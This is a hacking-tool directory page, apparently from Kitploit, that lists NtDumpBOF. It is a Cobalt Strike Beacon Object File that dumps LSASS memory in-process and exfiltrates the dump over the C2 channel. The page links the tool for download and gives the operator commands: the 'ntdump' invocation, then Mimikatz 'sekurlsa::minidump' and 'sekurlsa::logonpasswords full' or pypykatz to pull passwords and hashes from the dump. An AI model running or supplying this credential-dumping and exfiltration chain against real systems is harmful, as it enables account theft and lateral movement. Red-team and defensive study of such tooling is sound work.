Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
NtDumpBOF — Cobalt Strike BOF that creates an LSASS minidump in memory and exfiltrates it over the C2 callback for offline credential parsing with Mimikatz or pypykatz. | Kitploit
Tools/GitHubGitHub/deh00ni/ntdumpbof
Data ExfiltrationPost-ExploitationRed Teaming
GitHubdeh00ni/ntdumpbof

NtDumpBOF

Cobalt Strike BOF that creates an LSASS minidump in memory and exfiltrates it over the C2 callback for offline credential parsing with Mimikatz or pypykatz.

View Repository
1001452 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

NtDumpBOF

BOF port of the tool https://github.com/ricardojoserf/NativeDump written by @ricardojoserf.

Import NtDump.cna and run:

root@kitploit:~
ntdump <filename>

The minidump file will be created in memory and downloaded using CALLBACK_FILE and CALLBACK_FILE_WRITE. Once downloaded the file will be visible at View -> Download.

This can subsequently be parsed using Mimikatz

root@kitploit:~
mimikatz # sekurlsa::minidump <file path to downloaded minidump file>
mimikatz # sekurlsa::logonpasswords full

Or pypykatz

root@kitploit:~
pypykatz lsa minidump <file path to downloaded minidump file>
Download Tool